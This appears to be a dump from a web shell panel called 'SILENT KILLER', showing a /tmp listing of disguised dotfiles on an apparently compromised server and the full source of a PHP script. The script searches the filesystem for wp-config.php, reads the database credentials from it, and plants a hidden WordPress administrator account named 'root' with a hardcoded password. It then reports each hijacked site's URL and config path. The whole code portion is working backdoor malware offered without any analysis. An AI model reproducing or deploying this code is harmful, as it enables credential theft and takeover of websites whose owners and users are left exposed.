SILENT KILLER Tool

Name	Type	Size	Last Modified
.1750704159	File	74 bytes	June 23 2025 18:42:39.
.accept	File	855 bytes	August 03 2025 09:55:36.
.accepted	File	52 bytes	August 03 2025 10:01:01.
.bind	File	4360 bytes	July 28 2025 08:12:44.
.binding	File	4360 bytes	July 28 2025 08:11:08.
.cache	File	1002 bytes	August 03 2025 10:14:27.
.center	File	56 bytes	August 03 2025 10:17:26.
.class	File	1002 bytes	August 03 2025 10:13:38.
.classes	File	3592 bytes	August 03 2025 10:09:58.
.comp	File	4360 bytes	July 30 2025 13:27:07.
.component	File	95 bytes	August 02 2025 02:48:17.
.config	File	52 bytes	August 03 2025 10:06:40.
.content	File	3665 bytes	August 03 2025 09:52:03.
.created	File	47 bytes	August 03 2025 09:28:39.
.data	File	4384 bytes	August 03 2025 01:56:54.
.data_chunk	File	4360 bytes	July 28 2025 07:06:12.
.db2_convert	File	650 bytes	August 03 2025 10:03:39.
.dba_insertion	File	3608 bytes	August 03 2025 10:06:01.
.dbx_convert	File	48 bytes	August 03 2025 10:06:43.
.desc	File	4360 bytes	July 30 2025 13:09:26.
.descriptor	File	57 bytes	July 25 2025 08:47:09.
.element	File	51 bytes	August 01 2025 08:52:34.
.ent	File	4360 bytes	August 02 2025 06:23:55.
.entity	File	95 bytes	July 31 2025 09:37:26.
.entry	File	56 bytes	June 02 2025 12:35:46.
.fac	File	59 bytes	July 25 2025 09:32:49.
.flag	File	46 bytes	August 03 2025 09:27:50.
.flg	File	768 bytes	August 03 2025 10:21:38.
.hld	File	47 bytes	July 01 2025 07:47:24.
.htaccess	File	0 bytes	June 17 2024 07:32:18.
.ibase_pconnection	File	3688 bytes	August 03 2025 09:20:10.
.include	File	1260 bytes	August 03 2025 10:00:38.
.internal	File	628 bytes	August 03 2025 08:54:46.
.item	File	4360 bytes	August 03 2025 07:04:56.
.itm	File	4360 bytes	July 30 2025 13:32:21.
.k	File	62 bytes	July 25 2025 09:32:48.
.key	File	1144 bytes	August 02 2025 15:14:53.
.lock	File	52 bytes	August 03 2025 10:06:46.
.locked	File	6435 bytes	August 03 2025 09:55:29.
.marker	File	4360 bytes	July 30 2025 12:48:47.
.mb_convert	File	1230 bytes	August 03 2025 10:18:58.
.mrk	File	62 bytes	July 25 2025 08:32:02.
.multi	File	1190 bytes	August 03 2025 09:30:44.
.oauthexceptions	File	3232 bytes	August 03 2025 08:48:19.
.ob_iconv_handle	File	830 bytes	August 03 2025 09:22:47.
.obj	File	4360 bytes	July 30 2025 13:22:54.
.object	File	54 bytes	July 21 2025 07:59:30.
.parameter_group	File	1654 bytes	July 28 2025 20:02:02.
.parle_tokens	File	756 bytes	August 03 2025 10:19:16.
.partition	File	5903 bytes	August 03 2025 10:02:14.
.pgrp	File	53 bytes	July 25 2025 09:04:12.
.pointer	File	4360 bytes	August 03 2025 06:49:57.
.post	File	874 bytes	August 03 2025 09:22:12.
.property_set	File	4360 bytes	August 01 2025 03:14:56.
.pset	File	4360 bytes	July 31 2025 06:55:45.
.ptr	File	4360 bytes	August 03 2025 06:46:27.
.record	File	4360 bytes	July 31 2025 13:01:19.
.ref	File	4360 bytes	July 28 2025 08:14:00.
.reference	File	4360 bytes	July 30 2025 13:31:16.
.request	File	759 bytes	August 03 2025 10:19:20.
.res	File	4360 bytes	July 21 2025 09:41:37.
.resource	File	49 bytes	July 31 2025 19:26:49.
.rfind	File	1221 bytes	August 03 2025 10:19:51.
.rindex	File	45 bytes	August 03 2025 09:57:48.
.rjust	File	1285 bytes	August 03 2025 09:11:13.
.s.PGSQL.5432	File	bytes	January 01 1970 00:00:00.
.symbol	File	52 bytes	July 29 2025 19:50:10.
.sys	File	52 bytes	August 03 2025 10:00:57.
.system	File	2401 bytes	August 03 2025 09:24:34.
.tkn	File	4360 bytes	July 30 2025 13:12:58.
.token	File	44 bytes	May 31 2025 11:59:14.
.uconvert	File	655 bytes	August 03 2025 09:59:28.
.val	File	4360 bytes	July 15 2025 12:52:11.
index.php	File	0 bytes	June 17 2024 07:32:18.
mysql.sock	File	0 bytes	July 18 2025 10:32:28.
phpBPPmUS	File	1008 bytes	July 28 2025 03:47:01.
phpOi586t	File	1008 bytes	July 27 2025 11:33:02.
phpUFlZrn	File	1008 bytes	July 27 2025 15:21:12.
phpXv4JvZ	File	1008 bytes	July 27 2025 15:21:12.
phpfLarfl	File	1008 bytes	July 28 2025 03:47:01.

<?php   function scan($path) {     if ($dir = @opendir($path)) {         while (false !== ($file = readdir($dir))) {             $p = $path . DIRECTORY_SEPARATOR . $file;             if ($file != '.' && $file != '..') {                 if (is_link($p)) {                     continue;                 } elseif (is_dir($p)) {                     scan($p);                 } elseif ($file === 'wp-config.php') {                     inject($p);                 }             }         }     } } function inject($p) {     $user_login = 'root';     $user_password = 'Zb{0@U{vsFjq&#j(<?L[Iy0Hi_#9]i-LlJN0=Ec';     $user_email = 'admin@wordpress.com';     $data = file_get_contents($p);     $pattern = "/table_prefix\s*=\s*'([^']*)';/i";     if (preg_match($pattern, $data, $matches)) {         $table_prefix = $matches[1];     } else {         $table_prefix = 'wp_';     }     $lines = array_map('rtrim', file($p));     $conf = [];     foreach ($lines as $line) {         if (preg_match('/define\s*\(\s*[\'"]\s*(DB_USER|DB_HOST|DB_PASSWORD|DB_NAME)\s*[\'"]\s*,/', $line, $matches)) {             $conf[$matches[1]] = parse_define_value($line);         }     }     if (isset($conf['DB_HOST']) && isset($conf['DB_USER']) && isset($conf['DB_PASSWORD']) && isset($conf['DB_NAME'])) {         $mysqli = new mysqli($conf['DB_HOST'], $conf['DB_USER'], $conf['DB_PASSWORD'], $conf['DB_NAME']);         if ($mysqli->connect_errno) {             return;         }         if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) {             if ($result->num_rows > 0) {                 $result->close();                 $mysqli->close();                 return;             }             $result->close();         }         $add_user_query = "INSERT INTO `{$table_prefix}users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_status`, `display_name`) SELECT '{$user_login}', MD5('{$user_password}'), '{$user_login}', '{$user_email}', '',         (SELECT `user_registered` FROM `{$table_prefix}users` ORDER BY `ID` ASC LIMIT 1),         0, '{$user_login}' FROM DUAL WHERE NOT EXISTS (     SELECT 1 FROM `{$table_prefix}users` WHERE `user_login` = '{$user_login}' );";         if ($mysqli->query($add_user_query)) {             $add_usermeta_query1 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`)  SELECT `ID`, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;";             $add_usermeta_query2 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`)  SELECT `ID`, 'wp_user_level', '10' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;";             $mysqli->query($add_usermeta_query1);             $mysqli->query($add_usermeta_query2);         }         $site_url = false;         if ($result = $mysqli->query("SELECT option_value FROM {$table_prefix}options WHERE option_name = 'siteurl';")) {             $row = $result->fetch_object();             $result->close();             $site_url = $row->option_value;         }         if (!$site_url || strpos($site_url, 'http') !== 0) {             if ($result = $mysqli->query("SELECT user_url FROM {$table_prefix}users ORDER BY ID ASC LIMIT 1;")) {                 $row = $result->fetch_object();                 $result->close();                 $site_url = $row->user_url;             }         }         if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) {             if ($result->num_rows > 0) {                 echo "<f>{$site_url}@@@{$p}</f>\n";             }             $result->close();         }         $mysqli->close();     } } function parse_define_value($line) {     if (preg_match("/define\s*\(\s*['\"]\w+['\"]\s*,\s*['\"](.*)['\"]\s*\)\s*;/", $line, $matches)) {         return $matches[1];     }     return null; } function scanRootPaths() {     if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {         foreach (range('A', 'Z') as $driveLetter) {             $drive = $driveLetter . ':\\';             if (is_dir($drive)) {                 scan($drive);             }         }     } else {         scan('/home/codekrsu');     } } scanRootPaths(); die('!ended!');

SILENT KILLERPanel

Files and Folders in: //tmp

Reading File: //tmp/.itm